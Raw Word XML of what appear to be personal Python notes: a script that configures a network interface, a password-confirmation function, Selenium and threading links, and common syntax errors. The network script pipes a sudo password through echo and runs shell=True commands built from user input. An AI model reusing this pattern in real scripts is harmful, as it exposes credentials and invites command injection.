        <w:t>validate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0C7020D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44A83C0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'Succeeding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in passing NIC name check, reasonable ?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validate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:)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Proceeding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to configure NIC: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512EE2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'Please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enter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IP [e.g. 192.168.0.1]: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246DDF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3BEA62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3F9C47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ipRegex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'((10|1[0-9])|(17[1-9])|(19[1-9]))\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5]))\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5]))\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-4]))$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF30B4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validateIp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match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ipRegex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A0595C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validateIp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434F3F4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14:paraId="523BF7D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'validateIp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validateIp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19FB38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6B7BD6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'NIC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IP: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ip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seems reasonable :)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Proceeding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to configure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Netmask...'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1EAE7F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BD1179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netmask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'Please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enter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Netmask: [e.g. 255.255.255.0]'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F82CC2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7DFCFC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netmaskRegex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'^(0|128|192|224|240|248|252|254|255)\.(0|128|192|224|240|248|252|254|255)\.(0|128|192|224|240|248|252|254|255)\.(0|128|192|224|240|248|252|254|255)$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032378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Calculating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Network Address IP...'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188AE5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3948B2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4AB51A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</w:p>
    <w:p w14:paraId="5B693E7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# Calculate Network Address IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EA5F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ipcalc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mask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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>netmask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E82A25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networkAddressIP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str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guess_network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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499DB5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WHITE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Calculated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Network Address IP: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networkAddressIP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D7F566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9221B5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C807AE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14:paraId="17F6D72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validateNetmask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match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netmaskRegex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netmask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3A84BF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validateNetmask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1A77B61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</w:p>
    <w:p w14:paraId="7D91B5B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Netmask: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netmask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seems reasonable :)'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9F54F7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2F6C9E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Calculating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Network Address IP...'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0AD2AF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E56237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</w:p>
    <w:p w14:paraId="599B6EF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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Converting Netmask to CIDR [e.g. /24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFDA2D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cidr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sum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bin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>)).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>count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'1'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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in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netmask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split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'.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C33F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F43921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E47FE4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'CIDR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cidr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</w:p>
    <w:p w14:paraId="0AF3C58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4EDF26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7787CB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</w:p>
    <w:p w14:paraId="6455F7A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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gateway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'Please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enter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Default Gateway [e.g. 192.168.0.254]'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10BE80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0D19DF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</w:p>
    <w:p w14:paraId="14A556B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gatewayRegex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'((10|1[0-9])|(17[1-9])|(19[1-9]))\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5]))\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5]))\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-4]))$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC390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validateGateway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match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gatewayRegex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gateway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824316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validateGateway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7F89472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</w:p>
    <w:p w14:paraId="507B056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gateway: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gateway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seems reasonable :)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Proceeding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to create this NIC...'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A8BD5E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198E3D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</w:p>
    <w:p w14:paraId="6168A2E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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Adding this NIC configuration to /etc/network/interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063ECA9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addInterface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'echo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sudo_password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|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sudo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printf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"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auto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iface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inet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static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address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ip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netmask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netmask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gateway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gateway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up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route add -net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networkAddressIP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netmask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netmask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gw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gateway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" &gt;&gt; /etc/network/interfaces'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EFEC0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doAddInterface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Popen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addInterface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shell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stdout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PIPE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stderr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PIPE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C3DF60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doAddInterface_out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doAddInterface_err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doAddInterface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communicate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501504B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</w:p>
    <w:p w14:paraId="5163094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doAddInterface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returncode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5F68652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</w:p>
    <w:p w14:paraId="42FD5A0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C7324E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WHITE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doAddInterface_out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85C209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15A224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'Succeeded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in adding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to /etc/network/interfaces :)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Proceeding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to restart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using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systemctl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!'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9E2FD0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412B91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D5340E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'Adding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DNS server to /etc/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resolv.conf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DEDDBC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resolvConf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'/etc/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resolv.conf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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191600F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dns_server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'echo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sudo_password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|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printf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"nameserver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gateway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" &gt;&gt;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resolvConf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</w:p>
    <w:p w14:paraId="7C2F039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add_dns_server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Popen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dns_server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shell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stdout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PIPE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stderr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PIPE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2AA13E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add_dns_server_out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add_dns_server_err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add_dns_server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communicate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41CB0AA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</w:p>
    <w:p w14:paraId="2564217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add_dns_server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returncode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0D650E6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</w:p>
    <w:p w14:paraId="78E5568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135A18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WHITE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add_dns_server_out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183B20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452AB6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'Succeeded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in adding a new DNS server to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resolvConf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at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formatted_time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285C8D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17590D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642EB5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</w:p>
    <w:p w14:paraId="704C256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443B95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</w:p>
    <w:p w14:paraId="252AC94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5786DE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WHITE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add_dns_server_err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81C165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892246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98C707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</w:p>
    <w:p w14:paraId="1BC383A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Restarting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=&gt;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systemctl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stop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networking.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="369DC82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stopNetwork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'echo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sudo_password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|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sudo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/etc/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init.d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/networking stop'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E15368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doStopNetwork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Popen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stopNetwork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shell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stdout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PIPE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stderr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PIPE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ED973C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doStopNetwork_out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doStopNetwork_err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doStopNetwork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communicate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273C06A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doStopNetwork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returncode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44D8926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</w:p>
    <w:p w14:paraId="43747F4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743EA8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WHITE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doStopNetwork_out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388790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5971E4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'Succeeded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in stopping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:)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Proceeding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to start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at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formatted_time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170D6B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0E922C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</w:p>
    <w:p w14:paraId="4AE854B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startNetwork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'echo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sudo_password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|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sudo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/etc/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init.d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/networking start'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E07705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doStartNetwork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Popen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startNetwork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shell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stdout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PIPE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stderr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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>subprocess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PIPE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E6E5EE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doStartNetwork_out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doStartNetwork_err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doStartNetwork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communicate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3B3A8EF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</w:p>
    <w:p w14:paraId="508B808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doStartNetwork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returncode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12CEC35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</w:p>
    <w:p w14:paraId="2128A39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doStartNetwork_out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F18C08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39EF1B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YELLOW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'Succeeded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in starting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:)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Proceeding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to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sudo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ip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route add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ip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cidr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via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gateway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dev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3AC61F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737CC3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2A2921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      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CAEE4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123A13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</w:p>
    <w:p w14:paraId="3EEC6DC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F3C715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WHITE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doStartNetwork_err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CD4EEB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FD6FA1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'Failed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to start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:(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Please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manually start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by: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sudo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systemctl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start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Exiting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543FCE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C49C92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5B7204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D5E43B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# If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> could not be stopped =&gt; Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3457DFD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2A328B8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</w:p>
    <w:p w14:paraId="701F86C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4820D6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WHITE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doStopNetwork_err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C49208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C71BB6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22F288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Failed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to stop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Please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restart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manually by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sudo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systemctl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stop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sudo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systemctl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start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>networking.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Exiting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63268E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6EE758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51F843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51F6F4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</w:p>
    <w:p w14:paraId="11FD772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3CFC92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WHITE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doAddInterface_err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5650F2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102014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'Failed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to create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in /etc/network/interfaces :(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Exiting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4F926D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554CD1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14CDF4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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># If NIC Gateway is NOT valid =&gt; Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1E33D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2AB73D1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</w:p>
    <w:p w14:paraId="52AF2C2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53D2EE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73E2FB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nic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Gateway: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gateway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is NOT valid :(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Exiting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7BA1FE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A65D9B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05F5A8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# If NIC Netmask is NOT valid =&gt; Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520438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01CBA07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</w:p>
    <w:p w14:paraId="7BD873F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9E67A9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9F8EC5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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>netmask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is NOT a valid netmask :(...Proceeding...'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D905D8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66141F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C2D4BF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# If NIC IP is not reasonable =&gt; Exit this module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C93B3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32F2AFE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14:paraId="2353573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4F44823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24521A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'valideIp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validateIp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129903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28E417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671F72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'This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NIC IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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seems NOT reasonable...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Skipping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D245E3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740270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3265070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# If NIC name is not reasonable =&gt; Exit this module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE8917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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="C586C0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 xml:space="preserve">not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>validate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68220FBF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7DC2FA16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C0106D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E6F5E44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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Fore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RED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proofErr w:type="spellStart"/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'Failed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to pass NIC name check :(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Please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enter a NIC name with String &amp; Number only :)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e.g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. eth0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e.g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>. ens1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exiting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes...'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17FFE1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6448D35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f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0EE9E89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E8CEDD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DAC43D8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3F8DADD8" w14:textId="18FC99FD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Password verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395315A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January 30, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43728DD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4:32 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB97490" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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B975E8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def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password_verification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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED0499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password1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'Please enter a new password, between 8 to 15 characters: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9D627B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match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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE71EC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while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">match </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>is False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0025276E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while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len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password1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>len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password1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>15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2C665F62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password1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 must be between 8 to 15 characters - please re-enter password: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E6603D3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password2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'Please verify password: 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5AAD99F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if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>password1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>password2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50F9146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 is valid'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E91055D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match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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87BF57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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC43E81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print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 is invalid'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99EA2CB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match</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D82DFA" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>password_verification</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5168765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F9082A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DF58EC7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55F13076" w14:textId="32CDEA50" w:rsidR="00233C26" w:rsidRDefault="005D412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 xml:space="preserve">Auto-Testing with Python </w:t>
      </w:r>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Selenium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DCF90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September 15, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584988E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4:46 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18161B8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06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Selenium Python Tutorial Series #6 - How to send keys, click, and upload images.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="232BBFF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06F8AF1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A13CC1" wp14:editId="76A49027">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130" name="Pictur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2C3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9D6628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8F22F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E3C7D7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1A56EF6" w14:textId="7777777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Threading &amp; concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E801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January 31, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A529C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12:29 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40B5C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0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https://realpython.com/intro-to-python-threading/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="198A37C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68ADF1A" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00B2731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2B15E1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223B126B" wp14:editId="4F3E5C13">
            <wp:extent cx="5334000" cy="6604000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131" name="Pictur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D46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EADCE5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Python concurrency programming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222916BC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10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https://realpython.com/courses/threading-python/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D59E01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BF6E29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95FADF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27646F2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16A0F6C2" w14:textId="20A2D947" w:rsidR="00233C26" w:rsidRDefault="00233C26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Common syntax errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38271BC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February 11, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F61C769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9:28 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752BD55E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DA5694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# Example 1 - Missing brackets for print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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" " % (var2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 xml:space="preserve">)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)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3DC421C1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print ("Found '%s' version '%'") % (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iptables_exe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, version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284FD0F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910642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print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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("Found '%s' version '%'") % (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iptables_exe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, version)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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE1C0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7E5404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0DFF5E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# Example 2 - Type Error 'Bytes' 'str' -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 xml:space="preserve">Missing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.encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()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1AE98067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version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re.sub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'^v', '',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re.split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('\s', out)[1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEFAEF6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817C80B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version =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re.sub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'^v', '', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>re.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('\s', out)[1])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.encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33621C1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DBC2B8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AC9E11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# Example 3 - Type Error 'Bytes' 'str' - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Missing .decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()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5DCC02F2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version &lt; "1.4":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7699D98C" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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print &gt;&gt;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sys.stderr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, "WARN: version '%s' has limited IPv6 support. See README for details." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BD5AF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% (version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D815DCA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6F7BF3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if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version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.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; "1.4":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69704B1E" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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print &gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys.stderr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, "WARN: version '%s' has limited IPv6 support. See README for details." </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEB470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% (version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CEDCD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1BA564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CA4D7F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AFD7153" w14:textId="77777777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4108922" w14:textId="77777777" w:rsidR="005D4128" w:rsidRDefault="005D4128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293C8E0B" w14:textId="3209A1F9" w:rsidR="00233C26" w:rsidRDefault="00233C2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sectPr w:rsidR="00233C2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5E1"/>
    <w:rsid w:val="00095BB5"/>
    <w:rsid w:val="00233C26"/>
    <w:rsid w:val="002B15E1"/>
    <w:rsid w:val="005D4128"/>
    <w:rsid w:val="008725FA"/>
    <w:rsid w:val="00B27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E163AD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{275107EF-67E6-2541-8C4C-4F8CA04F9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="DengXi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380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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_find.asp" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_replace.asp" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/functions.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_isprintable.asp" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/python/ref_string_swapcase.asp" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=X7vBbelRXn0&amp;pp=ygUfcHl0aG9uIG11bHRpcHJvY2Vzc2luZyB0dXRvcmlhbA%3D%3D" TargetMode="External"/><Relationship Id="rId22" 